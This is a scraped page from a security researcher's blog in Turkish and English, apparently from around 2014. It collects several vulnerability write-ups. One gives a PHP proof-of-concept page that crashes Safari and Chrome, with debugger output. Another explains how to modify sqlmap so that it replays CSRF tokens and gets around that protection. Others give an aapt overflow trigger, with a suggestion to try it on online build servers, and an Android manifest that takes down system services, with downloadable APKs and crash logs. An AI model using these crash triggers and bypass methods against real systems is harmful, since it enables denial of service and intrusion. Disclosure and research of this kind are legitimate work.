Featured Posts

<< >>

Mac OS X , iOS Chrome & Safari web browsers heap corruption bug

I think heap verify mechanism of Safari prevents the actual crash. PoC 1 –> http://ibrahimbalic.com/ios2/ PoC 2 –> http://ibrahimbalic.com/nets/ PHP code: <?php ob_start(“ob_gzhandler”); $ax = str_repeat(“aa/aa/./a”,2000000); ?> <html> <head> </head>

Sqlmap ile CSRF Bypass

Merhabalar,   Birçok güvenlik araştırmacısı penetrasyon testleri yaparken, zafiyet tespit edebilmek için veya tespit ettikleri zafiyetleri exploit edebilmek adına çeşitli araçlardan faydalanmaktadır. Bu araçlar genel olarak işlemleri otomatik hale getiriyor olsalar da kısmen

Baliç Bilişim Sitesi ve Eğitim İçerikleri Yenilendi.

Merhabalar, Baliç Bilişim’in websitesi ve eğitim içerikleri yenilendi. www.balicbilisim.com Android Temelleri Android Malware Analizi Android Adli-Bilişim Mac OS X ve iOS Temelleri Web Penetrasyon Testleri Mobil Penetrasyon Testleri Linux Temelleri

Windows Directory Bug

Hi Guys, I’d like to share a weird story with you. Today, I found this interesting bug/issue in Windows OS. earlier I tested on Windows 8.1(x64), Windows 7(x64) and Windows

Siber Güvenlik Konferansı 2014 İstanbul

Siber Güvenlik Konferansı 2014 İstanbul Geçtiğimiz yıllarda dünyaya damgası vuran ve siber dünyadan gelebilecek tehditlere karşı önemini daha çok hissettiren siber güvenlik, siber casus yetiştirme politikaları, siber savaşlar ve bu

Mac OS X , iOS Chrome & Safari web browsers heap corruption bug

I think heap verify mechanism of Safari prevents the actual crash.

PoC 1 –> http://ibrahimbalic.com/ios2/

PoC 2 –> http://ibrahimbalic.com/nets/

PHP code:

<?php
ob_start(“ob_gzhandler”);
$ax = str_repeat(“aa/aa/./a”,2000000);
?>
<html>
<head>
</head>
<body>
<a http://<?php echo $ax;?>” id=”test”>test</a>
</body>
</html>

 

 

Crash:

Expected Results:
0:000:x86> .frame /r
00 0042e294 60b8cdfc CoreFoundation!CFStringEncodingSetForceASCIICompatibility+0×90
eax=00000000 ebx=06fb2d90 ecx=00000061 edx=00000000 esi=4bc90020 edi=0ab60c40
eip=60b982d7 esp=0042e284 ebp=0042e294 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
CoreFoundation!CFStringEncodingSetForceASCIICompatibility+0×90:
60b982d7 66890c42 mov word ptr [edx+eax*2],cx ds:002b:00000000=????
0:000:x86> ub .
CoreFoundation!CFStringEncodingSetForceASCIICompatibility+0×73:
60b982ba c3 ret
60b982bb 33c0 xor eax,eax
60b982bd 3944240c cmp dword ptr [esp+0Ch],eax
60b982c1 7e1f jle CoreFoundation!CFStringEncodingSetForceASCIICompatibility+0x9b (60b982e2)
60b982c3 8b4c2404 mov ecx,dword ptr [esp+4]
60b982c7 0fb60c08 movzx ecx,byte ptr [eax+ecx]
60b982cb 668b0c4dc898c260 mov cx,word ptr CoreFoundation!_CFDefaultEightBitStringEncoding+0x1a8 (60c298c8)[ecx*2]
60b982d3 8b542408 mov edx,dword ptr [esp+8]

 

Sqlmap ile CSRF Bypass

Merhabalar,

 

Birçok güvenlik araştırmacısı penetrasyon testleri yaparken, zafiyet tespit edebilmek için veya tespit ettikleri zafiyetleri exploit edebilmek adına çeşitli araçlardan faydalanmaktadır. Bu araçlar genel olarak işlemleri otomatik hale getiriyor olsalar da kısmen yetersiz kaldıkları durumlar veya güvenlik denetimlerine takıldıkları zamanlar vardır. Bu başlık altında SQLMap aracını kullanarak CSRF(Cross-site Request Forgery) için alınmış bir dizi önlemi bypass etmenin yollarına deyineceğim.

ttttaaa

 

Burada kullanılan CSRF mekanizmasının çalışma anatomisine göz atacak olursak, Server’ın, Client için gönderdiği cevapta (response) sayfa içerisindeki formlar için random bir token oluşturulmuş. Server Client’tan gelecek olan her istek için bu token değerini beklemektedir. Eğer bu token gönderilirse, Istek(request) için Cevap(response) verilecektir. Sayfa her yenilendiğinde (her request için) o sayfaya özel uniq bir token oluşturulmakta ve yapılacak istek için bu token beklenmektedir.

 

SQLMap aracının bu seneryo/mekanizma içerisinde kullanacağımızı düşünürsek, yapılacak atack’ın başarısız olacağını hemen anlayabiliriz.SQLMap’ın bu seneryo içerisinde server için yapacağı her istek içerisinde server için bir token göndermesi gerekmektedir. Bu tip bir durum için SQLMap içerisinde yapılacak ufak bir kaç değişiklik ile SQLMap için bu yetenek kazandırılabilinir.

Hedefimiz SQLMap aracığını çalışma mekanizmasını değiştirmek suretiyle yapacağı her istek(request) öncesinde Server’dan ilgili token değerini alıp, yapacağı bir sonraki istek(request) içerisinde bu token’ı kullanması. Bu sebeple bulmamız gereken öncelikli şey SQLMap aracının istek yapmış olduğu modül.

https://github.com/sqlmapproject/sqlmap/blob/master/lib/request/connect.py

SQLMap aracı biraz incelediğimizde yapılan her istek için connect.py içerisinde bulunan getPage functionını kullandığını açıkça görebilmekteyiz. Seneryomuza göre yapılacak her işlem için SQLMap aracının server ile iletişim sağlaması ise bu function içerisinde değişiklik yapmamız bizim için yeterli olacaktır.

Seneryomuza göre şimdiki hedefimiz server’ın client için oluşturduğu token’ı sayfa içerisinde tespit etmek. Bunu anlamak için giden trafiği veya sayfa içerisinde source code’un incelenmesi faydalı olacaktır.

Bizim örneğimizde __RequestVerificationToken değeri içerisinde gidip geldiğini görüyoruz.

 

fffkret

Server’ın client için oluşturduğu random token’ın tutulduğu input değerini tespit ettik, Şimdiki hedefimiz sunucuya kendi cookie değerimiz ile istekte(request) bulunup, bize göndermiş olduğu cevap(response) içerisinde __RequestVerificationToken değerini alıp, SQLMap içerisinde gönderilecek post değeri içerisine yerleştirmek.

connectpy

 

Yukarıda görmüş olduğunuz gibi connect.py içerisinde getpage functionında değişiklikler yaptım, 1. aşama olarak server için kendi cookie değerimi set ediyorum ve 2. aşamada bu cookie değeri ile server’a istek yapıyorum(request). 2. aşamada server’ın bana göndermiş olduğu cevap(response) içerisinde aradığım __RequestVerificationToken değerini parçalıyorum(parse ediyorum). Bu değeri alıp 4 aşamada SQLMap’in post parametresinin içerisindeki csrfid değişkeni ile server’dan aldığım değişkeni yer değiştiriyorum. Bu sayede SQLMap yapacağı her istek içerisinde server’a requestverification token yollamış oluyor.
ffffa

Sqlmap içerisinde __RequestVerificationToken parametresinin değerini csrfid olarak verdiğim için her istekte alınan request token burayla yer değiştirilecektir.

Bu mantık ile farklı uygulamalarda farklı denetimleri bypass edebilirsiniz.

Herkese iyi çalışmalar dilerim

İbrahim

Baliç Bilişim Sitesi ve Eğitim İçerikleri Yenilendi.

Merhabalar,

Baliç Bilişim’in websitesi ve eğitim içerikleri yenilendi.

www.balicbilisim.com

Windows Directory Bug

Hi Guys,

I’d like to share a weird story with you.

Today, I found this interesting bug/issue in Windows OS. earlier I tested on Windows 8.1(x64), Windows 7(x64) and Windows Sever 2008 R2 (x64). I think they are present in all versions of its windows OS.

However Im not certain why this issue occured but I think it minght be related with NTFS.

Due to this issue the created folders are unable to be deleted.

mkdir “test /. /test”

windows_1

windows_2

windows_3

windows_4

if you created a file in folder, same file gets created in both folder also if any one of the folder is deleted, remaing file get corrupted.

windows_5

windows_6

Siber Güvenlik Konferansı 2014 İstanbul

https://lh6.googleusercontent.com/-rVac6pQsrRE/UoyzBYokSbI/AAAAAAAADmQ/-V5xJYnhVPQ/w140-h133-p/SGD-LOGO-RGB.jpg
Siber Güvenlik Konferansı 2014 İstanbul

Geçtiğimiz yıllarda dünyaya damgası vuran ve siber dünyadan gelebilecek tehditlere karşı önemini daha çok hissettiren siber güvenlik, siber casus yetiştirme politikaları, siber savaşlar ve bu alana yönelik olarak ülkelerin bütçelerinden ayırdıkları hatırı sayılır oranlara ulaşan rakamlar, siber güvenlik kavramını bireysel, kurumsal ve ülke güvenliği açısından kritik öneme kavuşturmuştur. Siber Güvenlik Derneği tarafından düzenlenecek olan Siber Güvenlik Konferansı bu eksendeki soru ve sorunlara çözüm önerileri sunmayı hedeflemektedir.

http://www.siberguvenlikkonferansi.org/

 

New generation brute force attacks

Hi guys,

Soon I will be sharing a method for brute force attacks. I tested on most of the big companies(Apple, Google, Microsoft etc.) which it worked well. I tried on over 20.000+ times password on any account and there seemed to be no problem occurring.

I have reported this issues to Google and Apple so i will be sharing these information’s when I get a reply from those companies and when its fixed.(i will not report to microsoft because they gave a bad experience to me in the past..)

I believe that many other company’s system has the same issue which must be fixed soon as possible.

For now I only have a response from google, i will publish it when i hear from apple.
googlePermissions

Android Eğitimi

Merhaba arkadaşlar,

Android OS & Android Uygulama geliştirme eğitimimiz devam ediyor.

Eğitim Tarihleri:
26 Nisan Cumartesi – 27 Nisan Pazar 2014 (1. sınıf)
Eğitim Yeri :
Atalar(kartal) / İstanbul
Eğitim Katılım Ücreti :
700 TL  (1 kişi )

iletişim :
ibrahim@balicbilisim.com
+90216 387 87 99
+90538 722 33 73

 

1. Android’e Genel Bakış.
2. Android Nedir?
3. Android Mimarisi
3.1.1. Android Internals
3.1.1.1.1. Applications
3.1.1.1.2. Application Framework
3.1.1.1.3. Libraries
3.1.1.1.4. Android Runtime(Core Libraries & Dalvik & ART )
3.1.1.1.5. Linux Kernel
3.1.2. Android APIs
3.1.2.1.1. PackageManager
3.1.2.1.2. Power Manager
3.1.2.1.3. Activity Manager
3.1.2.1.4. Alarm Manager
3.1.2.1.5. Window Manger
3.1.2.1.6. Bluetooth Service
3.1.2.1.7. Location Manager
3.1.2.1.8. Telephony Manager
3.1.2.1.9. ….
3.1.3. Android Data Storages
3.1.3.1.1. Internal Storage
3.1.3.1.2. External Storage
3.1.3.1.3. Shared Preferences
3.1.3.1.4. Network
3.1.3.1.5. SQLite
3.1.3.1.6. ..
4. Lab Ortamının Kurulumu & Ayarları
4.1.1. Ortam Araçları
4.1.1.1.1. Android SDK
4.1.1.1.2. Eclipse
4.1.1.1.3. Intellij IDEA
4.1.2. Android Tools & Debugging
4.1.2.1.1. Android Debug Bridge ( adb )
4.1.2.1.2. Android Asset Packaging Tool ( aapt )
4.1.2.1.3. Dalvik Debug Monitor Server ( ddms )
4.1.2.1.4. Network Trafik Analizi
4.1.2.1.5. Logcat, Dumpsys
5. Egzersiz
5.1.1. 3 Adet Uygulama Geliştirme
5.1.2. 3 Adet Uygulama Analiz

 

* Eğitime katılacak öğrencilerin kimlik kartları ile birlikte gelmeleri şartıyla katılım ücretinde %40 indirim uygulanacaktır.
** Her sınıf için 1 kişilik ücretsiz öğrenci kontenjanımız vardır.(maddi durumu iyi olmayan arkadaşlar için)
*** Eğitime katılacak katılımcıların1 adet windows işletim yüklü taşınabilir bilgisayar getirmeleri zorunludur.

Göya Apple ve Google Yalanlamış?

Bazı kişi ve kişiler adıma karşı uzun zamandır karalama kampanyası başlattılar. Yaptıklarıma karşı yalan yanlış, kaynak belirtmeksizin birşeyler yazıp ciziyorlar. Onlara sadece gülüyorum.

Öncelikle apple ile alakalı olarak kesinlikle belirtmek istiyorum ki Apple şirketi konuya karşı “iyi” yada “kötü” hiç bir resmi açılamada bulunmadı.

Apple şirketi prösedür’ü gereği resmi olarak sadece şu sayfada http://support.apple.com/kb/ht1318 ilgili zafiyeti bildiren kişilerin adını ve zafiyetin türünü belirtmektedir.

Bunları ben değil, Apple söylüyor;

2013-07-29 iCloud.com/mail

A stored cross-site scripting issue was addressed. We would like to acknowledge Ibrahim BALIC (Balich IT – www.balicbilisim.com) for reporting this issue.

2013-07-25 developer.apple.com

A stored cross-site scripting issue was addressed. We would like to acknowledge Ibrahim BALIC (Balich IT – www.balicbilisim.com) for reporting this issue.

2013-07-25 itunesconnect.apple.com

Nine stored cross-site scripting issues were addressed. We would like to acknowledge Ibrahim BALIC (Balich IT – www.balicbilisim.com) for reporting these issues.

2013-07-23 iCloud.com/calendar

A stored cross-site scripting issue was addressed. We would like to acknowledge Ibrahim BALIC (Balich IT – www.balicbilisim.com) for reporting this issue.

2013-07-22 iadworkbench.apple.com

An information disclosure issue was addressed. We would like to acknowledge Ibrahim BALIC (Balich IT – www.balicbilisim.com) for reporting this issue.

 

Şu günlerde ise bu insanlar aynı karalama kampanyasını Google şirketi için başlattılar.
Allah aşkına soruyorum, söylesinler; Google şirketi bu açıklamaları nerede yapmış? bana kaynak göstersinler yeter…

Herkes çok iyi hatırlar ki, Olayı ben değil Apple şirketi kendi duyurmuştu ve O günlerde Apple şirketi kendi kullanıcılarına kendisi şu emaili göndermişti.

appleolayi

 

Burada açıkca görüldüğü üzere Apple ilgili olayda uygulama geliştirici(developer)’in adının(name), soyadının(surname), email id ve apple idlerine ulaşıldığını şifrelerin güven altında olduğunu açıklamıştı.

Bunların hiç birini ben söylemedim, Apple şirketi kendisi bildirmişti.

Ben olayı ve tüm bu süreçte ulaştığım o belgeleri bu video’da paylaşmıştım.

Bu video’yada açıkca gözüktüğü gibi konuyla alakalı olarak benim ulaştığım Ad,soyad ve apple idleri açıkca görebilirsiniz.

Ama bazı kötü niyetli kişiler,özelliklede hiç bir kaynak göstermeksizin hiç bir mantıklı açıklama yapmaksızın adıma karşı karalama kampanyası yürütüyorlar. Yaptıkları açıklamada Apple şirketinin durumu inkar ettiğini dile getiriyorlar, Şayet böyle bir resmi kaynakları varsa bunu herkesle paylaşmaları gerekiyor aksi takdirde kaynak göstermeksizin bu tip söylemlerde bulunmalarının hiç bir mantikli açıklaması bulunmamaktadır.

Yine bazı kişiler kaynak göstermeksizin bu olayın code execution’dan olayı kaynaklandığını belirtiyorlar, Eğer code execution’ın zafiyeti ile neler yapılabileneceğini biliyor olsaydınız emin olun Code Execution gerçekleştirilen bir sunucuda kullanıcı adı, soyadı ve email adreslerinin alınmayacağını çok iyi bilirler. (şayet apple şirketi kullanıcı bilgilerini plain text olarak metin belgesinin içinde saklamıyorsa… lol)

Code Execution gerçekleştirmek demek o sunucuda kod çalıştırabilmek demektir. Tabikide bu tip zafiyetler çok tehlikeli olabilmektedir fakat bunu gerçekleştiren kişi komple server’ın kontrolünü ele geçirebilir sadece ad,soyad,email adresi almaz vs vs.

Apple olayı geçti gitti bu karalama yapanların kıskançlıkları dindi derken üstüne google olayı ile yine kudurdular, Google Olayı inkar etti diyorlar… Allah aşkına google nerede ve ne zaman açıklama yapmış? Ne demiş bir açıklasınlarda tüm dünya bilse?

Google konu ile alakalı “sorunlar giderildi dışında” hiçbir resmi açıklama yapmamıştır.

https://support.google.com/googleplay/android-developer/known-issues/24493?hl=en

Sadece ilgili sorunların giderildiğini açıklamıştır bunun dışında hiç bir açıklamada bulunulmadı. Ben konuyu, konuyla alakalı tüm kanıtları ortaya koydum.

Google için yaptığım zafiyet bildirimi, rapor idsi ve tarihini buradan açıkca görebilirsiniz.

 

asdasdas

 

Olayların başlangıç tarihini ve insanların yazdıkları yorumları buradan görebilirsiniz:

https://code.google.com/p/android/issues/detail?id=67226

 

Aksini kanıtlayacak veya iddaa edicek herkes için ben burdayim fakat yalan yanlış hiç bir kaynak belirtmeksizin yaptıkları saldırıların sadece ve sadece tek amacı vardır oda karalamaktır.

İbrahim

Android Asset Packaging Tool (aapt) BoF

Hi guys,

I’ve discovered a vulnerability in aapt(Android Asset Packaging Tool) which causes a possible memory corruption.

The cause of the bugs is the namespace attributes value length. e.g. :  android:sharedUserLabel=”22007+ chars”

if you set any attribute value in AndroidManifest.xml and set as big long value (22007+ chars) try to compiling via aapt your project. triggers the bug.

command line:
aapt package -v -f -M [Projectpath]\AndroidManifest.xml -S [projectpath]\res -I [AndroidSDK]\platforms\android-19\android.jar -F [Projectpath]\AndroidTest.apk

afafa

 

 

AndroidManifest.xml içerisinde herhangi bir girdinin (örnek olarak ben “android:sharedUserLabel=” kullandım) değerini, 22007+ ve fazlası olarak tanımlarsanız ve bu projeyi aapt ile derlemeye çalışırsanız hatayı tetikleyebilirsiniz.

eğer exploit edebilirseniz online compiling işlemi yapan serverlarda deneme şansınız olabilir ( :

(örnek olarak http://appinventor.mit.edu/explore/ )

mit

crash özeti:

eax=002ed209 ebx=0028e9c4 ecx=0005e800 edx=002ed20a esi=0028f384 edi=0005e846
eip=00435837 esp=0028e9b0 ebp=0028ede8 iopl=0 nv up ei ng nz ac pe cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010297
aapt+0×35837:
00435837 807aff0a cmp byte ptr [edx-1],0Ah ds:002b:002ed209=??
0:000> ub .
aapt+0×35822:
00435822 53 push ebx
00435823 e8a8760500 call aapt+0x8ced0 (0048ced0)
00435828 89c7 mov edi,eax
0043582a 83c410 add esp,10h
0043582d 8d1403 lea edx,[ebx+eax]
00435830 8d42ff lea eax,[edx-1]
00435833 39c3 cmp ebx,eax
00435835 731a jae aapt+0×35851 (00435851)
0:000> ub 0028e9c4
0028e9bc 61 popad
0028e9bd 61 popad
0028e9be 61 popad
0028e9bf 61 popad
0028e9c0 61 popad
0028e9c1 61 popad
0028e9c2 61 popad
0028e9c3 61 popad

Android malformed APK DoS – Part II

Hi Guys,

I found a new DoS technique for Android Devices.

a many services continuous shuts ..

  • Launcher Service
  • Google Play Service
  • AOSP Android Keyboard
  • android.process.acore

The cause of the bugs is the “android:sharedUserLabel” and  “android:versionName” namespace attributes length in AndroidManifest.xml.

if you set the “longstring” in strings.xml and set as big long value (2322480+ chars) which triggers the bug.

<?xml version=”1.0″ encoding=”utf-8″?>
<manifest xmlns:android=”http://schemas.android.com/apk/res/android”
package=”com.balicit.GooglePlayServiceDoS”
android:sharedUserLabel=”@string/longstring”
android:versionCode=”1″
android:versionName=”@string/longstring”>
<uses-sdk android:minSdkVersion=”7″/>
<application android:label=”@string/app_name” android:icon=”@drawable/ic_launcher”>
<activity android:name=”MyActivity”
android:label=”@string/app_name”>
<intent-filter>
<action android:name=”android.intent.action.MAIN”/>
<category android:name=”android.intent.category.LAUNCHER”/>
</intent-filter>
</activity>
</application>
</manifest>

 

If you want to test, Install this app and run your android device.

Download Unsigned Apk

Download Signed Apk

 

/ActivityManager(14833): START {flg=0×10000000 cmp=com.balicit.GooglePlayServiceDoS/.MyActivity u=0} from pid 26385
D/AndroidRuntime(26385): Shutting down VM
D/dalvikvm(26398): Late-enabling CheckJNI
D/dalvikvm(26385): GC_CONCURRENT freed 102K, 81% free 494K/2560K, paused 1ms+1ms, total 6ms
D/dalvikvm(26385): Debugger has detached; object registry had 1 entries
I/ActivityManager(14833): Start proc com.balicit.GooglePlayServiceDoS for activity com.balicit.GooglePlayServiceDoS/.MyActivity: pid=26398 uid=10088 gids={1015, 1028}
I/AndroidRuntime(26385): NOTE: attach of thread ‘Binder_3′ failed
E/Trace (26398): error opening trace file: No such file or directory (2)
E/JavaBinder(26398): !!! FAILED BINDER TRANSACTION !!!
D/AndroidRuntime(26398): Shutting down VM
W/dalvikvm(26398): threadid=1: thread exiting with uncaught exception (group=0x40d782a0)
E/AndroidRuntime(26398): FATAL EXCEPTION: main
E/AndroidRuntime(26398): java.lang.AssertionError: android.os.TransactionTooLargeException
E/AndroidRuntime(26398): at android.app.LoadedApk.initializeJavaContextClassLoader(LoadedApk.java:363)
E/AndroidRuntime(26398): at android.app.LoadedApk.getClassLoader(LoadedApk.java:320)
E/AndroidRuntime(26398): at android.app.LoadedApk.makeApplication(LoadedApk.java:493)
E/AndroidRuntime(26398): at android.app.ActivityThread.handleBindApplication(ActivityThread.java:4124)
E/AndroidRuntime(26398): at android.app.ActivityThread.access$1300(ActivityThread.java:130)
E/AndroidRuntime(26398): at android.app.ActivityThread$H.handleMessage(ActivityThread.java:1255)
E/AndroidRuntime(26398): at android.os.Handler.dispatchMessage(Handler.java:99)
E/AndroidRuntime(26398): at android.os.Looper.loop(Looper.java:137)
E/AndroidRuntime(26398): at android.app.ActivityThread.main(ActivityThread.java:4745)
E/AndroidRuntime(26398): at java.lang.reflect.Method.invokeNative(Native Method)
E/AndroidRuntime(26398): at java.lang.reflect.Method.invoke(Method.java:511)
E/AndroidRuntime(26398): at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:786)
E/AndroidRuntime(26398): at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:553)
E/AndroidRuntime(26398): at dalvik.system.NativeStart.main(Native Method)
E/AndroidRuntime(26398): Caused by: android.os.TransactionTooLargeException
E/AndroidRuntime(26398): at android.os.BinderProxy.transact(Native Method)
E/AndroidRuntime(26398): at android.content.pm.IPackageManager$Stub$Proxy.getPackageInfo(IPackageManager.java:1343)
E/AndroidRuntime(26398): at android.app.LoadedApk.initializeJavaContextClassLoader(LoadedApk.java:361)
E/AndroidRuntime(26398): … 13 more
W/ActivityManager(14833): Force finishing activity com.balicit.GooglePlayServiceDoS/.MyActivity
I/Icing (26147): Internal init done: storage state 0
I/Icing (26147): Post-init done
E/JavaBinder(26147): !!! FAILED BINDER TRANSACTION !!!
W/dalvikvm(26147): threadid=14: thread exiting with uncaught exception (group=0x40d782a0)
E/AndroidRuntime(26147): FATAL EXCEPTION: Thread-1029
E/AndroidRuntime(26147): java.lang.RuntimeException: Package manager has died
E/AndroidRuntime(26147): at android.app.ApplicationPackageManager.getPackageInfo(ApplicationPackageManager.java:77)
E/AndroidRuntime(26147): at ecn.a(SourceFile:75)
E/AndroidRuntime(26147): at eaa.j(SourceFile:2010)
E/AndroidRuntime(26147): at eae.a(SourceFile:1958)
E/AndroidRuntime(26147): at eba.run(SourceFile:321)
E/AndroidRuntime(26147): at android.os.Handler.handleCallback(Handler.java:615)
E/AndroidRuntime(26147): at android.os.Handler.dispatchMessage(Handler.java:92)
E/AndroidRuntime(26147): at android.os.Looper.loop(Looper.java:137)
E/AndroidRuntime(26147): at dzm.run(SourceFile:38)
E/AndroidRuntime(26147): Caused by: android.os.TransactionTooLargeException
E/AndroidRuntime(26147): at android.os.BinderProxy.transact(Native Method)
E/AndroidRuntime(26147): at android.content.pm.IPackageManager$Stub$Proxy.getPackageInfo(IPackageManager.java:1343)
E/AndroidRuntime(26147): at android.app.ApplicationPackageManager.getPackageInfo(ApplicationPackageManager.java:72)
E/AndroidRuntime(26147): … 8 more
W/ActivityManager(14833): Activity pause timeout for ActivityRecord{41491e20 com.balicit.GooglePlayServiceDoS/.MyActivity}
I/ActivityManager(14833): START {act=android.intent.action.MAIN cat=[android.intent.category.HOME] flg=0×10000000 cmp=com.android.launcher/com.android.launcher2.Launcher u=0} from pid 0
D/dalvikvm(26317): GC_CONCURRENT freed 1357K, 13% free 10139K/11591K, paused 9ms+11ms, total 74ms
I/ActivityManager(14833): Displayed com.android.launcher/com.android.launcher2.Launcher: +424ms (total +1s176ms)
D/audio_hw_primary(14704): out_standby(0x4008d388)
D/audio_hw_primary(14704): do_output_standby(0x4008d388)
I/wpa_supplicant( 3904): [CTRL_IFACE]wlan0: SIGNAL_POLL
I/Process (26147): Sending signal. PID: 26147 SIG: 9
D/audio_hw_primary(14704): select_output_device(mode=0, devices=0×40002)
D/audio_hw_primary(14704): ~~~~ select_output_device : hs=0 , hp=0, sp=2
D/audio_hw_primary(14704): speaker_on
D/audio_hw_primary(14704): start_output_stream(adev->devices=0×40002, adev->mode=0)
D/audio_hw_primary(14704): ————open on board audio——-
I/ActivityManager(14833): Process com.google.android.gms (pid 26147) has died.
W/ActivityManager(14833): Scheduling restart of crashed service com.google.android.gms/.playlog.service.PlayLogBrokerService in 5000ms
W/ActivityManager(14833): Scheduling restart of crashed service com.google.android.gms/.icing.service.IndexWorkerService in 14998ms
I/Process (26398): Sending signal. PID: 26398 SIG: 9
I/ActivityManager(14833): Process com.balicit.GooglePlayServiceDoS (pid 26398) has died.
I/Process (26317): Sending signal. PID: 26317 SIG: 9
I/WindowState(14833): WIN DEATH: Window{419e9908 com.android.launcher/com.android.launcher2.Launcher paused=false}
W/InputDispatcher(14833): channel ’419e9908 com.android.launcher/com.android.launcher2.Launcher (server)’ ~ Consumer closed input channel or an error occurred. events=0×9
E/InputDispatcher(14833): channel ’419e9908 com.android.launcher/com.android.launcher2.Launcher (server)’ ~ Channel is unrecoverably broken and will be disposed!
I/ActivityManager(14833): Process com.android.launcher (pid 26317) has died.
W/InputDispatcher(14833): Attempted to unregister already unregistered input channel ’419e9908 com.android.launcher/com.android.launcher2.Launcher (server)’
I/WindowManager(14833): WINDOW DIED Window{419e9908 com.android.launcher/com.android.launcher2.Launcher paused=false}
I/ActivityManager(14833): Start proc com.android.launcher for activity com.android.launcher/com.android.launcher2.Launcher: pid=26419 uid=10038 gids={1028}
E/Trace (26419): error opening trace file: No such file or directory (2)
I/ActivityThread(26419): Pub com.android.launcher2.settings: com.android.launcher2.LauncherProvider
D/dalvikvm(26419): GC_FOR_ALLOC freed 175K, 5% free 6260K/6535K, paused 12ms, total 12ms
D/dalvikvm(26419): GC_CONCURRENT freed 274K, 6% free 6448K/6791K, paused 1ms+2ms, total 14ms
I/wpa_supplicant( 3904): [CTRL_IFACE]wlan0: SIGNAL_POLL
D/dalvikvm(26419): GC_CONCURRENT freed 234K, 5% free 6728K/7047K, paused 5ms+13ms, total 70ms
D/libEGL (26419): loaded /system/lib/egl/libEGL_mali.so
D/libEGL (26419): loaded /system/lib/egl/libGLESv1_CM_mali.so
D/libEGL (26419): loaded /system/lib/egl/libGLESv2_mali.so
D/OpenGLRenderer(26419): Enabling debug mode 0
W/InputMethodManagerService(14833): Got RemoteException sending setActive(false) notification to pid 26317 uid 10038
D/dalvikvm(26419): GC_CONCURRENT freed 228K, 5% free 6917K/7239K, paused 2ms+2ms, total 17ms
I/ActivityManager(14833): Displayed com.android.launcher/com.android.launcher2.Launcher: +1s55ms
W/System.err(14833): android.os.DeadObjectException
W/System.err(14833): at android.os.BinderProxy.transact(Native Method)
W/System.err(14833): at com.android.internal.widget.IRemoteViewsAdapterConnection$Stub$Proxy.onServiceDisconnected(IRemoteViewsAdapterConnection.java:101)
W/System.err(14833): at com.android.server.AppWidgetServiceImpl$ServiceConnectionProxy.disconnect(AppWidgetServiceImpl.java:150)
W/System.err(14833): at com.android.server.AppWidgetServiceImpl.bindRemoteViewsService(AppWidgetServiceImpl.java:643)
W/System.err(14833): at com.android.server.AppWidgetService.bindRemoteViewsService(AppWidgetService.java:230)
W/System.err(14833): at com.android.internal.appwidget.IAppWidgetService$Stub.onTransact(IAppWidgetService.java:315)
W/System.err(14833): at android.os.Binder.execTransact(Binder.java:367)
W/System.err(14833): at dalvik.system.NativeStart.run(Native Method)
D/dalvikvm(26419): GC_CONCURRENT freed 37K, 2% free 7355K/7495K, paused 3ms+3ms, total 31ms
D/dalvikvm(25526): GC_FOR_ALLOC freed 353K, 9% free 6244K/6855K, paused 22ms, total 22ms
D/dalvikvm(25526): GC_FOR_ALLOC freed 298K, 9% free 6255K/6855K, paused 17ms, total 18ms
D/dalvikvm(26419): GC_CONCURRENT freed 29K, 2% free 7845K/7943K, paused 3ms+2ms, total 32ms
D/dalvikvm(26419): WAIT_FOR_CONCURRENT_GC blocked 12ms
D/dalvikvm(26419): WAIT_FOR_CONCURRENT_GC blocked 6ms
D/dalvikvm(25526): GC_FOR_ALLOC freed 302K, 9% free 6248K/6855K, paused 11ms, total 11ms
D/dalvikvm(26419): GC_CONCURRENT freed 49K, 2% free 8334K/8455K, paused 2ms+4ms, total 28ms
D/dalvikvm(25526): GC_FOR_ALLOC freed 327K, 9% free 6255K/6855K, paused 11ms, total 12ms
D/dalvikvm(25526): GC_FOR_ALLOC freed 346K, 9% free 6261K/6855K, paused 16ms, total 17ms
D/dalvikvm(26419): GC_CONCURRENT freed 54K, 2% free 8974K/9095K, paused 1ms+3ms, total 21ms
W/System.err(14833): android.os.DeadObjectException
W/System.err(14833): at android.os.BinderProxy.transact(Native Method)
W/System.err(14833): at com.android.internal.widget.IRemoteViewsAdapterConnection$Stub$Proxy.onServiceDisconnected(IRemoteViewsAdapterConnection.java:101)
W/System.err(14833): at com.android.server.AppWidgetServiceImpl$ServiceConnectionProxy.disconnect(AppWidgetServiceImpl.java:150)
W/System.err(14833): at com.android.server.AppWidgetServiceImpl.bindRemoteViewsService(AppWidgetServiceImpl.java:643)
W/System.err(14833): at com.android.server.AppWidgetService.bindRemoteViewsService(AppWidgetService.java:230)
W/System.err(14833): at com.android.internal.appwidget.IAppWidgetService$Stub.onTransact(IAppWidgetService.java:315)
W/System.err(14833): at android.os.Binder.execTransact(Binder.java:367)
W/System.err(14833): at dalvik.system.NativeStart.run(Native Method)
E/RemoteViewsAdapter(26419): Error in updateRemoteViews(9): null RemoteViews returned from RemoteViewsFactory.
E/RemoteViewsAdapter(26419): Error in updateRemoteViews(0): null RemoteViews returned from RemoteViewsFactory.
E/RemoteViewsAdapter(26419): Error in updateRemoteViews(1): null RemoteViews returned from RemoteViewsFactory.
E/RemoteViewsAdapter(26419): Error in updateRemoteViews(2): null RemoteViews returned from RemoteViewsFactory.
E/RemoteViewsAdapter(26419): Error in updateRemoteViews(3): null RemoteViews returned from RemoteViewsFactory.
E/RemoteViewsAdapter(26419): Error in updateRemoteViews(4): null RemoteViews returned from RemoteViewsFactory.
E/RemoteViewsAdapter(26419): Error in updateRemoteViews(5): null RemoteViews returned from RemoteViewsFactory.
E/RemoteViewsAdapter(26419): Error in updateRemoteViews(6): null RemoteViews returned from RemoteViewsFactory.
E/RemoteViewsAdapter(26419): Error in updateRemoteViews(7): null RemoteViews returned from RemoteViewsFactory.
E/RemoteViewsAdapter(26419): Error in updateRemoteViews(8): null RemoteViews returned from RemoteViewsFactory.
E/RemoteViewsAdapter(26419): Error in updateRemoteViews(0): null RemoteViews returned from RemoteViewsFactory.
E/RemoteViewsAdapter(26419): Error in updateRemoteViews(1): null RemoteViews returned from RemoteViewsFactory.
E/RemoteViewsAdapter(26419): Error in updateRemoteViews(2): null RemoteViews returned from RemoteViewsFactory.
